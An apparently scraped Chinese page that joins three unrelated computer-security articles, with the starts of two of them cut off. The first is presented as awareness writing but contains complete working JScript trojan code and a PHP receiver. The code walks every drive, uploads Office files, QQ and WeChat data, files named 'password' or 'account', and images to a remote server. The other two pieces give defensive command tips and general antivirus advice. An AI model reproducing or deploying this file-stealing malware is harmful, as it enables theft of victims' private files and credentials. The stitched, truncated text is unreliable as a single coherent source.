讀:在日常電腦使用中,很多小伙伴都會從互聯網下載網站或是QQ、微信等聊天軟件中進行傳輸安裝軟件、文件等。略知網絡安全的朋友們都會比較謹慎所安裝的軟件是否安全,比如說通過殺毒軟件殺毒、通過對文件的后綴、圖標、大小等分析,那么這樣的操作真的就是安全的嗎?
相信大家都對遠程木馬有所了解,名氣最大的應該是灰鴿子遠程木馬,它就是通過后綴為exe文件誘導用戶點擊,從而造成個人隱私、文件的泄漏甚至金錢損失。
灰鴿子木馬界面
隨著互聯網安全工具越來越成熟,對之前的exe木馬文件的云查殺越發嚴格,基本上做過免殺的程序也挺不了多久就被發現,所以像這類的遠程木馬已經慢慢消失成為歷史。
但是道高一尺魔高一丈,最新的遠程木馬通過新的途徑新的方式悄然出現,它就是利用js代碼來獵取你的電腦文件,更為可怕的是它可以通過邏輯代碼自動地進入電腦文件中搜索預設好的文件后綴進行分析獲取,比如說代碼只想獲取你的聊天記錄,那么它會通過檢索查找到QQ、微信等數據庫文件上傳獲取、也可以通過查找相冊等目錄獲取照片等隱私文件,危害還是非常大的,本期文章小君就對js木馬進行分析,看它是如何獲取文件的。
優點:
缺點:
QQ傳輸引導中馬時會自動改后綴名稱,所以很大程度上是需要通過將js代碼進行壓縮后引導安裝。
首先需要木馬使用者搭建一臺服務器,當然也可以是虛擬空間、vps等都是可以的,然后搭建PHP環境,大家都知道像灰鴿子這類遠程木馬都有客戶端和服務端兩部分,那么js木馬同樣也有,需要在PHP環境下上傳服務端代碼server.php文件,在網站目錄下新建一個目錄upload用于獲取中馬者的隱私文件,接下來就是將js代碼也就是木馬的客戶端發送給被控者引導點擊,如果成功點擊,遠程服務器將會開始不斷收到上傳的隱私文件。
效果圖
js木馬客戶端代碼如下:
var __POSTURL__='http://www.xxx.com/server.php';
function UpFile(FilePath, FileName) {
var Stream=new ActiveXObject('ADODB.Stream');
Stream.Type=1;
Stream.Open();
Stream.LoadFromFile(FilePath);
var XHR=new ActiveXObject('Msxml2.XMLHTTP' || 'Microsoft.XMLHTTP');
XHR.open('POST', __POSTURL__, false);
XHR.setRequestHeader('fileName', FileName);
XHR.setRequestHeader('enctype', 'multipart/form-data');
XHR.send(Stream.Read());
Stream.Close();
return XHR.responseText
}
function GetDriveList() {
var fso=new ActiveXObject("Scripting.FileSystemObject");
var e=new Enumerator(fso.Drives);
var re=[];
for (; ! e.atEnd(); e.moveNext()) {
if (e.item().IsReady) {
re.push(e.item().DriveLetter)
}
}
return re
}
function GetFolderList(folderspec) {
var fso=new ActiveXObject("Scripting.FileSystemObject");
var f=fso.GetFolder(folderspec);
var fc=new Enumerator(f.SubFolders);
var re=[];
for (; ! fc.atEnd(); fc.moveNext()) {
re.push(fc.item())
}
return re
}
function GetFileList(folderspec) {
var fso=new ActiveXObject("Scripting.FileSystemObject");
var f=fso.GetFolder(folderspec);
var fc=new Enumerator(f.files);
var re=[];
for (; ! fc.atEnd(); fc.moveNext()) {
re.push([fc.item(), fc.item().Name])
}
return re
}
function Search(Drive) {
var FolderList=GetFolderList(Drive);
for (var i=0; i < FolderList.length; i++) {
Search(FolderList[i])
}
var FileList=GetFileList(Drive);
for (var i=0; i < FileList.length; i++) {
if (/\.(doc|docx|xls|xlsx)$/i.test(FileList[i])) {
UpFile(FileList[i][0], FileList[i][1])
}
}
}
function Load() {
var WMIs=GetObject("winmgmts:\\\\.\\root\\cimv2");
var Items=WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name='wscript.exe'");
var i=0,
rs=new Enumerator(Items);
for (; ! rs.atEnd(); rs.moveNext()) {
i++
}
if (i > 1) WScript.Quit(0);
Items=WMIs=i=rs=null;
var DriveList=GetDriveList();
for (var i=0; i < DriveList.length; i++) {
Search(DriveList[i] + ":\\\\")
}
}
Load();PHP服務端代碼:
<?php
if($_SERVER['REQUEST_METHOD']=='POST'){
$fileName=uniqid(rand()) . '_' . iconv('utf-8', 'gbk', $_SERVER['HTTP_FILENAME']);
print_r(file_put_contents("uploads/{$fileName}", $HTTP_RAW_POST_DATA));
}
?>1、獲取微信、QQ等隱私信息
function GetQQWechat() {
var QQList=[];
var WechatList=[];
var QQPath="C:\\Users\\" + USERNAME+ "\\Documents\\Tencent Files"
var WechatPath="C:\\Users\\" + USERNAME+ "\\Documents\\WeChat Files"
var Patt=new RegExp(/[^\\]+$/);
if (FSO.folderExists(QQPath)) {
var QQFolderList=GetFolderList(QQPath);
if (QQFolderList) {
for (var i=0; i < QQFolderList.length; i++) {
var QQFolderStr=QQFolderList[i];
var QQResult=Patt.exec(QQFolderStr);
var QQ="";
if (QQResult) QQ=QQResult[0];
if (QQ=="All Users") continue;
QQList.push(QQ);
}
}
}
if (FSO.folderExists(WechatPath)) {
var WechatFolderList=GetFolderList(WechatPath);
if (WechatFolderList) {
for (var i=0; i < WechatFolderList.length; i++) {
var WechatFolderStr=WechatFolderList[i];
var WechatResult=Patt.exec(WechatFolderStr);
var Wechat="";
if (WechatResult) Wechat=WechatResult[0];
if (Wechat=="All Users") continue;
WechatList.push(Wechat);
}
}
}
return {"QQList":QQList, "WechatList":WechatList}
}2、通過政策表達式獲取文件名含"賬號"、"密碼"、"account"、"password"等文件
if (/((賬號|密碼|password|passwd|account)+(.*)*\.(txt|doc|docx|xls|xlsx)$)|(\.(JPG|PNG)$)/.test(FileList[i][1])) {
UpFile(FileList[i][0], FileList[i][1])
}3、獲取目標電腦用戶名
function GetUserName() {
var WshNetwork=new ActiveXObject("WScript.Network");
var UserName=WshNetwork.UserName;
return UserName;
}
XHR.setRequestHeader('userName', USERNAME);以上代碼僅供研究,請勿非法利用!
結語:
看到這里是不是感覺自己的電腦并非那么的安全,我們在日常使用中,首先要有一定的安全意識,任何文件的傳輸,不要不做分析就隨意雙擊打開,養成使用殺毒軟件查殺的習慣,雖然并不能保證完全被查殺,但最起碼也能過濾百分之九十以上的木馬文件,剩下的就要靠自己的分析和判斷,莫名其妙來源文件不接,圖標異常的不接、文件大小與所需要內容不對等的文件不接。感謝您閱讀本期網絡安全普及文章,如果本文對您有所幫助請關注點贊喲,如果在網絡安全中遇到問題請在評論區或私信留言。
ello各位朋友們大家好,我是90小哥愛數碼。
那么今天小哥想要和大家分享的內容是和電腦病毒、木馬有關,我知道呀朋友們只要一聽到這兩個詞匯心里頭都會多多少少有一些害怕或者是不舒服。因為我們在平常使用電腦的時候,最最重要的就是要做好對電腦的病毒防護工作,不能夠讓我們的電腦受到一點點病毒的侵犯,因為這關系到我們個人信息和一些重要資料的安全性以及可靠性。如果一旦我們的電腦遭受到了病毒以及木馬的侵犯那么我們大家可想而知我們存儲在電腦里的,重要資料及一些重要的個人信息就會被病毒亦或是木馬盜取那么我們都重要信息很有可能就會被一些不法的人而得到從而被利用。
那么下面呢,小哥就教大家使用這三個命令在日常使用電腦的過程中或者是在閑暇的時候定期的來檢查你的電腦里面是否感染了病毒或者是木馬.這樣我們才可以做到防患于未然保證我們電腦就安全。
好的下面小哥呢,就把具體的操作方法以及要用到哪些命令大家介紹一下:
第一檢查自己電腦的網絡連接狀態,看一下是否有其他人或自己不熟悉的陌生設備通過你的網絡連接到電腦上面。詳細的命令代碼為:netstat -an使用本命令可以看到所有和本地計算機建立連接的IP它包含四個部分proto(連接方式)、local aDDRess(本地連接地址)、foreign address(和本地建立連接的地址)、state(當前端口狀態)。通過此命令的詳細信息,我們就可以完全監控計算機上的連接,從而達到監控自己計算機的目的。
第二,對計算機里面的不明服務項目一定要嚴格的禁止。朋友們如果有一天你們在打開電腦并且使用的時候突然發現,計算機的運行速度以及各個方面都變得十分緩慢不管使用任何的優化方式都不會起到作用。并且呢使用安全防護、殺毒軟件都檢測不出來有任何的問題。那么這個時候呢大家不必心急。此時,我們的第二個命令就會派上用場了。使用net start命令查看我們計算機里面所有的服務項目。如果一旦發現你不認識異常的正在運行的服務項目的時候,再使用net stop server來將這項不明的服務禁止。
最后一個,這最后一個呢是跟我們電腦的賬戶有關系。曾經吶在很長的一段時間里面一些不法人員通過對電腦賬戶的克隆從而來達到控制你電腦的目的這些人往往會通過克隆一個與你電腦賬戶名稱一模一樣的賬戶和名稱來肆意的對你的電腦進行操作。而通過這種方法來侵入你的電腦呢,用你的肉眼吶是看不出任何異常情況的就是和平常一樣。那么為了避免這樣有情況的發生呢我們的第三個命令現在就要出場了。我們首先使用net user這個命令來檢查我們電腦中全部的賬戶看一看有無異常情況如果發現有異常可以使用net user加這個異常的用戶名查詢他的權限。一般正常的用戶名Administrator是administrators組的其余都是屬于不正常的情況,一旦發現有除了這個賬戶以外的用戶名以及賬戶可立即使用net user用戶名/del來將它刪除掉就可以了。
好了各位朋友們,今天的內容就和大家分享到這里了。希望大家能夠通過本期的內容增長一些病毒和電腦安全防護方面的知識。喜歡小哥的朋友們請點下關注 多多轉發評論喲!!
謝謝大家
腦已經滲透到我們生活的每一個角落,成為現代社會不可或缺的工具。從工作文檔的處理到娛樂游戲的體驗,電腦以其高效、便捷的特點贏得了人們的青睞。然而,與此同時,電腦病毒也如同隱形的“幽靈”,時刻威脅著我們的電腦安全。那么,當電腦中病毒時,我們應該如何應對?在日常生活中又該注意哪些事項來預防電腦病毒呢?接下來,就讓我們一起深入探討這個問題。
一、電腦中病毒的識別與癥狀
電腦病毒是一種惡意軟件,它通過復制自身并感染其他文件或系統,從而對電腦造成損害。要識別電腦是否中病毒,我們需要留意一些異常癥狀。首先,電腦的運行速度可能會明顯變慢,因為病毒會占用系統資源。其次,電腦可能會頻繁彈出廣告窗口,影響用戶體驗。此外,文件可能被莫名刪除或加密,導致無法正常訪問。還有,系統可能會出現崩潰或無法啟動的情況。最后,如果你發現電腦行為異常,比如自動打開未知程序、頻繁訪問某些網站等,這也可能是電腦中病毒的跡象。
二、解決電腦病毒的方法
1. 安裝與更新殺毒軟件
殺毒軟件是預防與清除電腦病毒的重要工具。在選擇殺毒軟件時,我們要選擇知名品牌且信譽良好的產品,如瑞星、金山毒霸等。安裝后,務必保持其更新至最新版本,以便及時獲取最新的病毒庫和防護功能。同時,定期運行殺毒軟件進行全面掃描,以便及時發現并清除潛在的威脅。
2. 全盤掃描與精確清除
當懷疑電腦中病毒時,應立即進行全盤掃描。全盤掃描會檢查電腦上的每一個文件和程序,確保沒有遺漏任何潛在的威脅。根據殺毒軟件的檢測結果,我們可以精確地清除被感染的病毒。這可能需要一些時間,具體取決于電腦中毒的嚴重程度。在清除病毒的過程中,我們要耐心等待并相信殺毒軟件的能力。
3. 系統更新與漏洞修復
清除病毒后,我們要及時更新操作系統和相關軟件到最新版本。因為這些更新通常包含安全補丁和漏洞修復,可以有效提高系統的安全性。通過及時更新系統和軟件,我們可以減少病毒利用已知漏洞進行攻擊的風險。
4. 重要數據的備份與恢復
為了防止未來的病毒攻擊導致數據丟失,建議定期備份重要數據。備份數據時,可以選擇外部存儲設備如U盤、移動硬盤等,或者利用云存儲服務將數據上傳至云端。這樣即使電腦再次中毒,我們也能迅速恢復數據并減少損失。同時,在數據恢復過程中要注意驗證數據的完整性和可用性。
三、預防電腦病毒的注意事項
1. 不隨意下載不明來源的軟件
很多病毒都是通過偽裝成正常的軟件傳播的。在下載軟件時,我們要選擇正規渠道和可信賴的來源,如官方網站、知名軟件下載平臺等。同時,仔細閱讀軟件說明和用戶協議,了解軟件的功能和使用方式。避免下載來源不明的軟件可以大大降低中病毒的風險。
2. 避免點擊不明鏈接與附件
不要輕易點擊來自陌生人或不可信來源的鏈接和附件。這些鏈接和附件可能攜帶病毒或惡意軟件,一旦點擊就可能感染電腦。在日常生活中,我們要時刻保持警惕,不輕信他人關于破解軟件、免費游戲等誘惑性信息。同時,對于郵件中的附件也要謹慎處理,確保來源可靠后再進行下載。
3. 定期更新殺毒軟件與操作系統
為了確保殺毒軟件能夠有效應對最新的病毒威脅,我們要定期更新其病毒庫和功能模塊。此外,操作系統作為電腦的核心組件,也需要及時更新以修復潛在的安全漏洞。通過定期更新殺毒軟件和操作系統,我們可以提高電腦的安全性并減少病毒的入侵機會。
4. 謹慎使用U盤等移動存儲設備
U盤等移動存儲設備在給我們帶來便利的同時,也可能成為病毒傳播的媒介。在使用前最好對其進行病毒掃描,確保安全后再使用。同時,在使用過程中要注意避免與感染病毒的電腦共用同一U盤等移動存儲設備。
5. 保持警惕與提高安全意識
時刻保持對網絡安全的警惕性是預防電腦病毒的關鍵。我們要不輕信他人關于破解軟件、免費游戲等誘惑性信息;不隨意點擊不明鏈接和附件;不隨意下載不明來源的軟件;定期備份重要數據等。此外,我們還要提高安全意識并了解常見的網絡詐騙手段和防范措施。
總之,當電腦中病毒時,我們應該冷靜應對并采取科學有效的方法進行清除和處理。同時,在日常使用電腦時也要注意防范措施降低中病毒的風險。只有這樣我們才能更好地保護自己的電腦和數據安全并享受數字化時代帶來的便利與樂趣。